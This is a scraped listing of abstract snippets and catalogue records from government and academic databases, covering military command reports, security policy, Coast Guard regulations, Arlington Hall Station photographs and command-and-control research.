Army Soldier System Command: http://www.natick.armv.mil Role Name Facial Recognition Program Manager, Army Technical Lead Mark Chandler...security force with a facial recognition system. Mike Holloran, technology officer with the 6 Fleet, directed LCDR Hoa Ho and CAPT(s) Todd Morgan to...USN 6th Fleet was accomplished with the admiral expressing his support for continuing the evaluation of the a facial recognition system. This went
2009-09-01
DIFFIE-HELLMAN KEY EXCHANGE .......................14 III. GHOSTNET SETUP .........................................15 A. INSTALLATION OF OPENVPN FOR...16 3. Verifying the Secure Connection ..............16 B. RUNNING OPENVPN AS A SERVER ON WINDOWS ............17 1. Creating...Generating Server and Client Keys ............20 5. Keys to Transfer to the Client ...............21 6. Configuring OpenVPN to Use Certificates
Climate Change: Challenges and Opportunities for United States Pacific Command
2012-03-22
NUMBER OF PAGES 19a. NAME OF RESPONSIBLE PERSON a. REPORT UNCLASSIFED b. ABSTRACT UNCLASSIFED c . THIS PAGE UNCLASSIFED UNLIMITED 36...result in a price paid in military terms and human lives in the future.9 Climate Change as a Threat to National Security Joshua Busby , a professor at...willingness to fight those who threaten our expanding notion of national security. Busby includes climate change in this expanded definition of national
Northern Command: A Relevant and Necessary Partner to Increase Security in Mexico
2010-10-27
month.19 Drug cartels leverage low pay and offer “ plato o plomo” or “silver or lead” which forces policemen to choose between taking a bribe or a...Scott Stewart, Hezbollah, Radical but Rational , Stratfor Security Weekly, (12 August 2010), http://www.stratfor.com/weekly...34Hezbollah, Radical but Rational ." Stratfor.com. August 12, 2010. http://www.stratfor.com/weekly/20100811_hezbollah_radical_rational (accessed 28
2005-03-01
prevention, spouse 13 abuse, child abuse , suicide, alcohol, drug abuse 16. PRICE CODE 17. SECURITY CLASSIFICA TION 18. SECURITY CLASSIFICA TION 19...cohesion 9 Triple P Command) • Spouse emotional 0 Depressive 9 Common Sense Parenting abuse symptomatology * Child abuse & neglect e Relationship...and secretive problems Partner Physical Prescr. Illicit Child Abuse Abuse Partner Emo. Abuse Alcohol Drug Drug Suicid- c3-to- Problems Misuse Use ality
The Operator Shell: A means of privilege distribution under Unix
DOE Office of Scientific and Technical Information (OSTI.GOV)
Neuman, M.; Christoph, G.
1994-03-01
The Operator Shell (Osh) is a setuid root, security enhanced, restricted shell for providing fine-grain distribution of system privileges for a wide range of usages and requirements. Osh offers a marked improvement over other Unix privilege distribution systems in its ability to specify access to both commands and files, auditing features, and familiar interface. This paper describes the design, features, security considerations, internals, and applications of the Operator Shell.
Information Security Considerations for Applications Using Apache Accumulo
2014-09-01
Distributed File System INSCOM United States Army Intelligence and Security Command JPA Java Persistence API JSON JavaScript Object Notation MAC Mandatory... MySQL [13]. BigTable can process 20 petabytes per day [14]. High degree of scalability on commodity hardware. NoSQL databases do not rely on highly...manipulation in relational databases. NoSQL databases each have a unique programming interface that uses a lower level procedural language (e.g., Java
1992-04-03
10. SOURCE OF FUNDING NUMBERS PROGRAM PROJECT TASK WORK UNIT ELEMENT NO. NO. NO. ACCESSION NO. 11. TITLE (Include Security Classification) ASEAN...region is a consequence of the stability, coordination and team work of ASEAN. With a reduction of U.S. forces presence in the area, the key to securing...fastest-growing regions in the world today. The stability in the region is a consequence of the stability, coordination and team work of ASEAN. With a
2006-03-01
operations, and other applications for the MITOC that are beneficial to national security. It will illustrate how the concept was validated by the...of the potential impact on funding, a concern was noted in discussion among members of the National Emergency Management Association (NEMA) in their...This concept of a “virtual” Homeland Security-focused National Laboratory was comprised of the combined resources of the public and private
DoD Physical Security Technical Support at the 1980 Winter Olympics Village.
1980-09-02
support were provided to the 1980 Winter Olympic Games were: (1) Physical Security, (2) Communications- Electronics , and (3) Medical via the New York Army...vibration-based Fence Pro- tection System (FPS), manufactured by General Telephone and Electronics (GT& E ) and installed for the Federal Bureau of Prisons...CM (Mr. Woomert) DRSXY-GB (Mr. R. E . Cam) Aberdeen Proving Ground, MD 21005 Commander US Army Communications and Electronics Material Readiness
The new Mobile Command Center at KSC is important addition to emergency preparedness
NASA Technical Reports Server (NTRS)
2000-01-01
This new specially equipped vehicle serves as a mobile command center for emergency preparedness staff and other support personnel when needed at KSC or Cape Canaveral Air Force Station. It features a conference room, computer work stations, mobile telephones and a fax machine. It also can generate power with its onboard generator. Besides being ready to respond in case of emergencies during launches, the vehicle must be ready to help address fires, security threats, chemical spills, terrorist attaches, weather damage or other critical situations that might face KSC or CCAFS.
2011-09-01
that you did to help me through this process. Your efforts and guidance truly made this a success. To SPAWAR SCTD expert Stephanie Koontz , your...ty%20and%20Safety%20Services/05– 500%20Security%20Services/5510.36A.pdf [accessed June 19, 2011]. [28] S. Koontz . “Secret client tunneling...devices - KOV-26 talon user procedures.” Unpublished survey, SPAWAR, Point Loma, CA. [29] S. Koontz . “Secret client tunneling devices - KIV-54 user
The new Mobile Command Center at KSC is important addition to emergency preparedness
NASA Technical Reports Server (NTRS)
2000-01-01
This camper-equipped truck known as '''Old Blue''' served as mobile field command center for the Emergency Preparedness team at KSC. It has been replaced with a larger vehicle that includes a conference room, computer work stations, mobile telephones and a fax machine, plus its own onboard generator. Besides being ready to respond in case of emergencies during launches, the vehicle must be ready to help address fires, security threats, chemical spills, terrorist attaches, weather damage or other critical situations that might face KSC or Cape Canaveral Air Force Station.
2011-05-01
communications and on computer networks—its Global Information Grid—which are potentially jeopardized by the millions of denial-of-service attacks, hacking ...Director,a National Security Agency Chief of Staff Joint Operations Center Defense Information Systems Agency Command Center J1 J2 J3 J4 J5 J6 J7 J8...DC Joint Staff • J39, Operations, Pentagon, Washington, DC • J5 , Strategic Plans and Policy, Pentagon, Washington, DC U.S. Strategic Command • J882
Is Seeing Believing? Training Users on Information Security: Evidence from Java Applets
ERIC Educational Resources Information Center
Ayyagari, Ramakrishna; Figueroa, Norilyz
2017-01-01
Information Security issues are one of the top concerns of CEOs. Accordingly, information systems education and research have addressed security issues. One of the main areas of research is the behavioral issues in Information Security, primarily focusing on users' compliance to information security policies. We contribute to this literature by…
Starting Over: Current Issues in Online Catalog User Interface Design.
ERIC Educational Resources Information Center
Crawford, Walt
1992-01-01
Discussion of online catalogs focuses on issues in interface design. Issues addressed include understanding the user base; common user access (CUA) with personal computers; common command language (CCL); hyperlinks; screen design issues; differences from card catalogs; indexes; graphic user interfaces (GUIs); color; online help; and remote users.…
4. Photocopy of photograph, ca. 1944 (original print on file ...
4. Photocopy of photograph, ca. 1944 (original print on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). VIEW TO SOUTHEAST. - Arlington Hall Station, Building No. 115, 4000 Arlington Boulevard, Arlington, Arlington County, VA
4. Photocopy of photograph, ca. 1944 (original print on file ...
4. Photocopy of photograph, ca. 1944 (original print on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). VIEW TO SOUTHEAST. - Arlington Hall Station, Building No. 110, 4000 Arlington Boulevard, Arlington, Arlington County, VA
5. Photocopy of photograph, ca. 1944 (original print on file ...
5. Photocopy of photograph, ca. 1944 (original print on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). VIEW TO SOUTHWEST. - Arlington Hall Station, Building No. 101, 4000 Arlington Boulevard, Arlington, Arlington County, VA
4. Photocopy of photograph, ca. 1944 (original print on file ...
4. Photocopy of photograph, ca. 1944 (original print on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). VIEW TO NORTHEAST. - Arlington Hall Station, Building No. 126, 4000 Arlington Boulevard, Arlington, Arlington County, VA
4. Photocopy of photograph, ca. 1944 (original print on file ...
4. Photocopy of photograph, ca. 1944 (original print on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). VIEW TO SOUTH. - Arlington Hall Station, Building No. 102, 4000 Arlington Boulevard, Arlington, Arlington County, VA
NASA Technical Reports Server (NTRS)
Doland, G. D.
1977-01-01
System employs electronically randomized variant of quadraphase modulation and demodulation between two synchronized transceivers. System uses off-the-shelf components. It may be used with digital data, command signals, delta-modulated voice signals, digital television signals, or other data converted to digital form.
46 CFR 147.7 - Incorporation by reference.
Code of Federal Regulations, 2013 CFR
2013-10-01
... COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) DANGEROUS CARGOES HAZARDOUS SHIPS' STORES... approved material is available for inspection at Coast Guard Headquarters. Contact Commandant (CG-ENG... is also available for inspection at the National Archives and Records Administration (NARA). For...
2011-12-01
operating in their territory. NSHQ is a new and evolving organization, which was instructed to develop a rapidly deployable HQ. NSHQ receives its...single overarching concept, eliminating redundancy, and integrates new deployable operational C2 structures (notably NSHQ) agreed through the...of the command and control issue is the ability to communicate effectively both up and down the chain of command. With the new technologies
1991-01-01
New Zealand Air Force.4 To further complicate matters, General Douglas MacArthur, as Commander Southwest Pacific Area, and the adjoining theater...Army, Marine, and New Zealand officers and the top job was rotated fairly regularly among the services.10 By early 1943 a truly joint staff had...in joint air operations. 2C. Kenneth Allard, Command, Control, and the Common Defense, Yale University Press, New Haven, 1990. The authors strongly
Federal Register 2010, 2011, 2012, 2013, 2014
2010-10-25
... Document issued under 46 U.S.C., chapter 73, or a transportation security card issued under section 70105.... Merchant Mariner's Document issued under 46 U.S.C. chapter 73, or a transportation security card issued... Mariner's Document issued under 46 U.S.C. chapter 73, or a transportation security card issued under...
Disaster Victim Identification: quality management from an odontology perspective.
Lake, A W; James, H; Berketa, J W
2012-06-01
The desired outcome of the victim identification component of a mass fatality event is correct identification of deceased persons in a timely manner allowing legal and social closure for relatives of the victims. Quality Management across all aspects of the Disaster Victim Identification (DVI) structure facilitates this process. Quality Management in forensic odontology is the understanding and implementation of a methodology that ensures collection, collation and preservation of the maximum amount of available dental data and the appropriate interpretation of that data to achieve outcomes to a standard expected by the DVI instructing authority, impacted parties and the forensic odontology specialist community. Managerial pre-event planning responsibility, via an odontology coordinator, includes setting a chain of command, developing and reviewing standard operating procedures (SOP), ensuring use of current scientific methodologies and staff training. During a DVI managerial responsibility includes tailoring SOP to the specific situation, ensuring member accreditation, encouraging inter-disciplinary cooperation and ensuring security of odontology data and work site. Individual responsibilities include the ability to work within a team, accept peer review, and share individual members' skill sets to achieve the best outcome. These responsibilities also include adherence to chain of command and the SOP, maintenance of currency of knowledge and recognition of professional boundaries of expertise. This article highlights issues of Quality Management pertaining particularly to forensic odontology but can also be extrapolated to all DVI actions.
Cognitive-Behavioural Therapy for Command Hallucinations and Intellectual Disability: A Case Study
ERIC Educational Resources Information Center
Barrowcliff, Alastair L.
2008-01-01
Background: There is a paucity of literature detailing cognitive-behavioural therapy (CBT) for psychosis in people with intellectual disability. Of the available literature, only two case studies involve people with command hallucinations and these do not address specific issues of intervention indicated in the wider literature for this type of…
Unit Testing for Command and Control Systems
NASA Technical Reports Server (NTRS)
Alexander, Joshua
2018-01-01
Unit tests were created to evaluate the functionality of a Data Generation and Publication tool for a command and control system. These unit tests are developed to constantly evaluate the tool and ensure it functions properly as the command and control system grows in size and scope. Unit tests are a crucial part of testing any software project and are especially instrumental in the development of a command and control system. They save resources, time and costs associated with testing, and catch issues before they become increasingly difficult and costly. The unit tests produced for the Data Generation and Publication tool to be used in a command and control system assure the users and stakeholders of its functionality and offer assurances which are vital in the launching of spacecraft safely.
The next generation of command post computing
NASA Astrophysics Data System (ADS)
Arnold, Ross D.; Lieb, Aaron J.; Samuel, Jason M.; Burger, Mitchell A.
2015-05-01
The future of command post computing demands an innovative new solution to address a variety of challenging operational needs. The Command Post of the Future is the Army's primary command and control decision support system, providing situational awareness and collaborative tools for tactical decision making, planning, and execution management from Corps to Company level. However, as the U.S. Army moves towards a lightweight, fully networked battalion, disconnected operations, thin client architecture and mobile computing become increasingly essential. The Command Post of the Future is not designed to support these challenges in the coming decade. Therefore, research into a hybrid blend of technologies is in progress to address these issues. This research focuses on a new command and control system utilizing the rich collaboration framework afforded by Command Post of the Future coupled with a new user interface consisting of a variety of innovative workspace designs. This new system is called Tactical Applications. This paper details a brief history of command post computing, presents the challenges facing the modern Army, and explores the concepts under consideration for Tactical Applications that meet these challenges in a variety of innovative ways.
Code of Federal Regulations, 2010 CFR
2010-10-01
..., DEPARTMENT OF HOMELAND SECURITY (CONTINUED) LIFESAVING APPLIANCES AND ARRANGEMENTS LIFESAVING SYSTEMS FOR..., material, or lifesaving appliance or arrangement, the Commandant (CG-521) may accept any other fitting, material, or lifesaving appliance or arrangement that is at least as effective as that required by this...
Code of Federal Regulations, 2012 CFR
2012-10-01
..., DEPARTMENT OF HOMELAND SECURITY UNINSPECTED VESSELS TOWING VESSELS General Provisions for Fire-Protection... the Commandant; (2) A manually-operated clean-agent system that satisfies the National Fire Protection... or coastal service. Towing vessel in ocean or coastal service means a towing vessel that operates...
16. Photocopy of photograph, 1942 (original print on file at ...
16. Photocopy of photograph, 1942 (original print on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). VIEW OF CONSTRUCTION OF BUILDING 401. - Arlington Hall Station, Building No. 401, 4000 Arlington Boulevard, Arlington, Arlington County, VA
1. Photocopy of photograph, ca. 1980 (original print on file ...
1. Photocopy of photograph, ca. 1980 (original print on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). AERIAL VIEW OF ARLINGTON HALL STATION. VIEW TO NORTH. - Arlington Hall Station, 4000 Arlington Boulevard, Arlington, Arlington County, VA
33. Photocopy of architectural drawing, 1985 (original on file at ...
33. Photocopy of architectural drawing, 1985 (original on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). ARLINGTON HALL STATION. BLDG #1 -- HDQ. BASEMENT. - Arlington Hall Station, Main Building, 4000 Arlington Boulevard, Arlington, Arlington County, VA
Code of Federal Regulations, 2011 CFR
2011-07-01
... OR COMMERCIAL WASTE, AND BALLAST WATER Ballast Water Management for Control of Nonindigenous Species... for the Assistant Commandant for Marine Safety, Security, and Stewardship (CG-5) may, upon receipt of...
Code of Federal Regulations, 2010 CFR
2010-07-01
... OR COMMERCIAL WASTE, AND BALLAST WATER Ballast Water Management for Control of Nonindigenous Species... for the Assistant Commandant for Marine Safety, Security, and Stewardship (CG-5) may, upon receipt of...
32 CFR 806b.52 - Who needs training.
Code of Federal Regulations, 2010 CFR
2010-07-01
... in the design, development, operation and maintenance of any system of records. More specialized... specialists, finance officers, information managers, supervisors, and individuals working with medical and security records. Commanders will ensure that above personnel are trained annually in the principles and...
77 FR 69388 - Safety Zone; Water Main Crossing; Choctawhatchee Bay; Santa Rosa Beach, FL
Federal Register 2010, 2011, 2012, 2013, 2014
2012-11-19
... to authority the Administrative Procedure Act (APA) (5 U.S.C. 533(d)). This provision authorizes an... Department of Homeland Security Management Directive 023-01 and Commandant Instruction M16475.lD, which guide...
Addressing Commanders’ Needs for Information on Soft Factors
2011-01-01
international aFFairs law and Business national seCurity population and aging puBliC saFety sCienCe and teChnology terrorism and homeland seCurity this...Operations, by Eric V. Larson, Richard E. Darilek, Dalia Dassa Kaye, Forrest E. Morgan, Brian Nichiporuk, Diana Dunham-Scott, Cathryn Quantic Thurston...Richardson, Lowell H. Schwartz, and Cathryn Quantic Thurston, MG-654-A, 2009 (available at http://www.rand.org/pubs/monographs/MG654.html) and
Development of Individual Equipment Requirements for the Afghan National Army Needs Improvement
2012-05-25
Secur n Security F Communic t of the Isla ency Managemen ining Missio ion Comman nal Clothin operation I TACOM L Frequency eb site of th rts or...of information, including suggestions for reducing this burden, to Washington Headquarters Services, Directorate for Information Operations and...conta or fax (571 Deputy Ins by fax (571 of Inspecto General for F25-04 ity Forces orces Fund ations-Electr mic Republ t Command n-Afghanis d
AF-TRUST, Air Force Team for Research in Ubiquitous Secure Technology
2010-07-26
Charles Sutton, J. D. Tygar, and Kai Xia. Book chapter in Jeffrey J. P. Tsai and Philip S. Yu (eds.) Machine Learning in Cyber Trust: Security, Privacy...enterprise, tactical, embedded systems and command and control levels. From these studies, commissioned by Dr . Sekar Chandersekaran of the Secretary of the...Data centers avoid IP Multicast because of a series of problems with the technology. • Dr . Multicast (the MCMD), a system that maps traditional I PMC
The Polish Armed Forces: Warsaw Pact Reliability in Question.
1983-12-01
December 1983 Thesis Advisor: R. Looney Approved for public release distribution unlimite |i ( I’ jUN 0 )84 L 84 06 01 037 SECURITY CLASMICATION OF THIS...Edward Duffy Lieutenant Commander, United States Navy B.A., College of the Holy Cross, 1971 Submitted in partial fulfillment of the requirements for ...Poland has little choice in the matter. Poland is the most important piece of real estate vital to the security of the Soviet Union. The words of
2009-12-01
Police xii SBI Secure Border Initiative SES Senior Executive Service SSP Secretaria de Seguridad Publica TSA Transportation Security...also been involvement from the Mexican law enforcement agency, Secretaria de Seguridad Publica (SSP) on the southwest border (CBP, 2009; ICE, 2009, p. 5...The U.S. border is comprised of nearly 20,000 miles of a mix of coastline and rugged land borders with Mexico and Canada; this includes parts of
Federal Register 2010, 2011, 2012, 2013, 2014
2010-10-22
... rule. SUMMARY: The Captain of the Port of New Orleans, under the authority of the Magnuson Act, 33 CFR... without the permission of the Captain of the Port, New Orleans. This security zone is necessary to protect... questions on this temporary rule, call or e-mail Lieutenant Commander (LCDR) Eva VanCamp, Sector New Orleans...
Navy Family Separation and Physician Utilization.
1980-12-19
netowrk , support and neurosis, the function of attachment in adult life." American Journal of Psychiatry 131:185-191. Hinkle, L.E...8217 ’ ’ ’" . ’ _. ’ , .’" ’’’. ’ UNCLASSIFIED SECURITY CLASSIFICATION OF THIS PAGE (W en Dat Entered) REPORT DOCUMENTATION PAGE BEFORE COMPLETING FORM I. REPORT NUMBER 12g PIENT’S...PAGES 20 14 MONITORING AGENCY NAME & ADDRESS(It different from Controlling Office) 15. SECURITY CLASS. (of this report) Commander, Naval Medical
2012-06-08
ART AND SCIENCE Strategic Studies by MOHAMED ELSHOPKY, MAJOR., EGYPT M.Sc., Commanders and Staff Officers College, Cairo, 2008 B.Sc...Government of Egypt finds itself in a critical situation where both internal planning, along with regional and international cooperation are paramount...for making optimum use of this incredibly scarce resource. Egypt , and the rest of the Nile Basin countries, have been sharing water under the
2013-09-01
incidents beyond wild land fires.15 This journal article also noted that national IMTs provided command functions at the World Trade Center on September...11, 2001, Hurricane Katrina in 2005 and search and recovery efforts following the Space Shuttle Columbia disaster.16 Because of the utility and...Management Team SWA Southwest Area SWCC Southwest Coordination Center UASI Urban Area Security Initiative UAWG Urban Area Working Group
17 CFR 240.3a12-10 - Exemption of certain securities issued by the Resolution Funding Corporation.
Code of Federal Regulations, 2010 CFR
2010-04-01
... securities issued by the Resolution Funding Corporation. 240.3a12-10 Section 240.3a12-10 Commodity and... Exemptions § 240.3a12-10 Exemption of certain securities issued by the Resolution Funding Corporation. Securities that are issued by the Resolution Funding Corporation pursuant to section 21B(f) of the Federal...
Information System Engineering Supporting Observation, Orientation, Decision, and Compliant Action
NASA Astrophysics Data System (ADS)
Georgakopoulos, Dimitrios
The majority of today's software systems and organizational/business structures have been built on the foundation of solving problems via long-term data collection, analysis, and solution design. This traditional approach of solving problems and building corresponding software systems and business processes, falls short in providing the necessary solutions needed to deal with many problems that require agility as the main ingredient of their solution. For example, such agility is needed in responding to an emergency, in military command control, physical security, price-based competition in business, investing in the stock market, video gaming, network monitoring and self-healing, diagnosis in emergency health care, and many other areas that are too numerous to list here. The concept of Observe, Orient, Decide, and Act (OODA) loops is a guiding principal that captures the fundamental issues and approach for engineering information systems that deal with many of these problem areas. However, there are currently few software systems that are capable of supporting OODA. In this talk, we provide a tour of the research issues and state of the art solutions for supporting OODA. In addition, we provide specific examples of OODA solutions we have developed for the video surveillance and emergency response domains.
49 CFR 1554.103 - Security Directives.
Code of Federal Regulations, 2014 CFR
2014-10-01
... necessary to respond to a threat assessment or to a specific threat against civil aviation, TSA issues a..., DEPARTMENT OF HOMELAND SECURITY CIVIL AVIATION SECURITY AIRCRAFT REPAIR STATION SECURITY Security Measures... each Security Directive TSA issues to the repair station within the time prescribed. Each repair...
Autonomic responses to exercise: where is central command?
Williamson, J W
2015-03-01
A central command is thought to involve a signal arising in a central area of the brain eliciting a parallel activation of the autonomic nervous system and skeletal muscle contraction during exercise. Although much of the neural circuitry involved in autonomic control has been identified, defining the specific higher brain region(s) serving in a central command capacity has proven more challenging. Investigators have been faced with redundancies in regulatory systems, feedback mechanisms and the complexities ofhuman neural connectivity. Several studies have attempted to address these issues and provide more definitive neuroanatomical information. However, none have clearly answered the question, "where is central command?" Copyright © 2014 Elsevier B.V. All rights reserved.
Ntasis, Efthymios; Maniatis, Theofanis A; Nikita, Konstantina S
2003-01-01
A secure framework is described for real-time tele-collaboration on Virtual Simulation procedure of Radiation Treatment Planning. An integrated approach is followed clustering the security issues faced by the system into organizational issues, security issues over the LAN and security issues over the LAN-to-LAN connection. The design and the implementation of the security services are performed according to the identified security requirements, along with the need for real time communication between the collaborating health care professionals. A detailed description of the implementation is given, presenting a solution, which can directly be tailored to other tele-collaboration services in the field of health care. The pilot study of the proposed security components proves the feasibility of the secure environment, and the consistency with the high performance demands of the application.
46 CFR 58.25-15 - Voice communications.
Code of Federal Regulations, 2014 CFR
2014-10-01
... 46 Shipping 2 2014-10-01 2014-10-01 false Voice communications. 58.25-15 Section 58.25-15 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) MARINE ENGINEERING MAIN AND AUXILIARY MACHINERY... them has been approved by the Commanding Officer, Marine Safety Center. ...
46 CFR 58.25-15 - Voice communications.
Code of Federal Regulations, 2010 CFR
2010-10-01
... 46 Shipping 2 2010-10-01 2010-10-01 false Voice communications. 58.25-15 Section 58.25-15 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) MARINE ENGINEERING MAIN AND AUXILIARY MACHINERY... them has been approved by the Commanding Officer, Marine Safety Center. ...
46 CFR 58.25-15 - Voice communications.
Code of Federal Regulations, 2011 CFR
2011-10-01
... 46 Shipping 2 2011-10-01 2011-10-01 false Voice communications. 58.25-15 Section 58.25-15 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) MARINE ENGINEERING MAIN AND AUXILIARY MACHINERY... them has been approved by the Commanding Officer, Marine Safety Center. ...
46 CFR 58.25-15 - Voice communications.
Code of Federal Regulations, 2012 CFR
2012-10-01
... 46 Shipping 2 2012-10-01 2012-10-01 false Voice communications. 58.25-15 Section 58.25-15 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) MARINE ENGINEERING MAIN AND AUXILIARY MACHINERY... them has been approved by the Commanding Officer, Marine Safety Center. ...
46 CFR 58.25-15 - Voice communications.
Code of Federal Regulations, 2013 CFR
2013-10-01
... 46 Shipping 2 2013-10-01 2013-10-01 false Voice communications. 58.25-15 Section 58.25-15 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) MARINE ENGINEERING MAIN AND AUXILIARY MACHINERY... them has been approved by the Commanding Officer, Marine Safety Center. ...
32 CFR 1288.4 - Responsibilities.
Code of Federal Regulations, 2010 CFR
2010-07-01
... 32 National Defense 6 2010-07-01 2010-07-01 false Responsibilities. 1288.4 Section 1288.4 National Defense Other Regulations Relating to National Defense DEFENSE LOGISTICS AGENCY MISCELLANEOUS REGISTRATION OF PRIVATELY OWNED MOTOR VEHICLES § 1288.4 Responsibilities. (a) HQ DLA. (1) The command security...
9. Photocopy of photograph, ca. 1928 (original print on file ...
9. Photocopy of photograph, ca. 1928 (original print on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). AERIAL VIEW OF ARLINGTON HALL JUNIOR COLLEGE. VIEW TO SOUTHWEST. - Arlington Hall Station, 4000 Arlington Boulevard, Arlington, Arlington County, VA
36. Photocopy of architectural drawing, 1985 (original on file at ...
36. Photocopy of architectural drawing, 1985 (original on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). ARLINGTON HALL STATION. BLDG #1 -- HDQ. 3RD FLOOR. - Arlington Hall Station, Main Building, 4000 Arlington Boulevard, Arlington, Arlington County, VA
37. Photocopy of architectural drawing, 1985 (original on file at ...
37. Photocopy of architectural drawing, 1985 (original on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). ARLINGTON HALL STATION. BLDG #1 -- HDQ. 4TH FLOOR. - Arlington Hall Station, Main Building, 4000 Arlington Boulevard, Arlington, Arlington County, VA
34. Photocopy of architectural drawing, 1985 (original on file at ...
34. Photocopy of architectural drawing, 1985 (original on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). ARLINGTON HALL STATION. BLDG #1 -- HDQ. 1ST FLOOR. - Arlington Hall Station, Main Building, 4000 Arlington Boulevard, Arlington, Arlington County, VA
35. Photocopy of architectural drawing, 1985 (original on file at ...
35. Photocopy of architectural drawing, 1985 (original on file at U.S. Army Intelligence Security Command, Fort Belvoir, Virginia). ARLINGTON HALL STATION. BLDG #1 -- HDQ. 2ND FLOOR. - Arlington Hall Station, Main Building, 4000 Arlington Boulevard, Arlington, Arlington County, VA
Code of Federal Regulations, 2010 CFR
2010-10-01
... 46 Shipping 7 2010-10-01 2010-10-01 false Equivalents. 170.010 Section 170.010 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) SUBDIVISION AND STABILITY STABILITY REQUIREMENTS FOR..., arrangements, calculations, information, or tests required in this subchapter may be approved by the Commandant...
Code of Federal Regulations, 2011 CFR
2011-10-01
... 46 Shipping 7 2011-10-01 2011-10-01 false Equivalents. 170.010 Section 170.010 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) SUBDIVISION AND STABILITY STABILITY REQUIREMENTS FOR..., arrangements, calculations, information, or tests required in this subchapter may be approved by the Commandant...
Code of Federal Regulations, 2014 CFR
2014-10-01
... 46 Shipping 7 2014-10-01 2014-10-01 false Equivalents. 170.010 Section 170.010 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) SUBDIVISION AND STABILITY STABILITY REQUIREMENTS FOR..., arrangements, calculations, information, or tests required in this subchapter may be approved by the Commandant...
Code of Federal Regulations, 2013 CFR
2013-10-01
... 46 Shipping 7 2013-10-01 2013-10-01 false Equivalents. 170.010 Section 170.010 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) SUBDIVISION AND STABILITY STABILITY REQUIREMENTS FOR..., arrangements, calculations, information, or tests required in this subchapter may be approved by the Commandant...
Code of Federal Regulations, 2012 CFR
2012-10-01
... 46 Shipping 7 2012-10-01 2012-10-01 false Equivalents. 170.010 Section 170.010 Shipping COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) SUBDIVISION AND STABILITY STABILITY REQUIREMENTS FOR..., arrangements, calculations, information, or tests required in this subchapter may be approved by the Commandant...
United States European Command
Organization The Region History Media Library Articles Press Releases Photos Videos Documents Blog Posts Us Press Releases Site Policies Site Translation (Disclaimer) EUCOM's disclaimer regarding this . More in Site Policies External Links Privacy and Security Accessibility/Section 508 Site Translation
32 CFR 1288.4 - Responsibilities.
Code of Federal Regulations, 2014 CFR
2014-07-01
... 32 National Defense 6 2014-07-01 2014-07-01 false Responsibilities. 1288.4 Section 1288.4 National Defense Other Regulations Relating to National Defense DEFENSE LOGISTICS AGENCY MISCELLANEOUS REGISTRATION OF PRIVATELY OWNED MOTOR VEHICLES § 1288.4 Responsibilities. (a) HQ DLA. (1) The command security...
32 CFR 1288.4 - Responsibilities.
Code of Federal Regulations, 2012 CFR
2012-07-01
... 32 National Defense 6 2012-07-01 2012-07-01 false Responsibilities. 1288.4 Section 1288.4 National Defense Other Regulations Relating to National Defense DEFENSE LOGISTICS AGENCY MISCELLANEOUS REGISTRATION OF PRIVATELY OWNED MOTOR VEHICLES § 1288.4 Responsibilities. (a) HQ DLA. (1) The command security...
32 CFR 1288.4 - Responsibilities.
Code of Federal Regulations, 2011 CFR
2011-07-01
... 32 National Defense 6 2011-07-01 2011-07-01 false Responsibilities. 1288.4 Section 1288.4 National Defense Other Regulations Relating to National Defense DEFENSE LOGISTICS AGENCY MISCELLANEOUS REGISTRATION OF PRIVATELY OWNED MOTOR VEHICLES § 1288.4 Responsibilities. (a) HQ DLA. (1) The command security...
32 CFR 1288.4 - Responsibilities.
Code of Federal Regulations, 2013 CFR
2013-07-01
... 32 National Defense 6 2013-07-01 2013-07-01 false Responsibilities. 1288.4 Section 1288.4 National Defense Other Regulations Relating to National Defense DEFENSE LOGISTICS AGENCY MISCELLANEOUS REGISTRATION OF PRIVATELY OWNED MOTOR VEHICLES § 1288.4 Responsibilities. (a) HQ DLA. (1) The command security...
Code of Federal Regulations, 2011 CFR
2011-07-01
... 33 Navigation and Navigable Waters 2 2011-07-01 2011-07-01 false Delegations. 140.20 Section 140.20 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) OUTER CONTINENTAL SHELF ACTIVITIES GENERAL General § 140.20 Delegations. (a) Each District Commander is responsible...
Code of Federal Regulations, 2010 CFR
2010-07-01
... 33 Navigation and Navigable Waters 2 2010-07-01 2010-07-01 false Delegations. 140.20 Section 140.20 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF HOMELAND SECURITY (CONTINUED) OUTER CONTINENTAL SHELF ACTIVITIES GENERAL General § 140.20 Delegations. (a) Each District Commander is responsible...
Command History, 1971. Supplement. Sanitized
1971-01-01
NATIONALS. The security classification for each page is that of the highest classified paragraph thereon. Reproduction of TOP SECRET portions of the 1971...BROWN STALLION (Laos). The primary objective was to enlist assistance of the local populace. -- The Thong Cam magazine, a PSYOP publication, was
EMERGENCY PREPAREDNESS CONTACT REQUEST A SPEAKER REQUEST A COLOR GUARD OPERATIONAL CONTRACT SUPPORT every two years and makes recommendations to the President, through the Secretary of Defense, on changes Preparedness Contact Request A Speaker Request A Color Guard Stay Connected Privacy & Security Inspector
A model for the control mode man-computer interface dialogue
NASA Technical Reports Server (NTRS)
Chafin, R. L.
1981-01-01
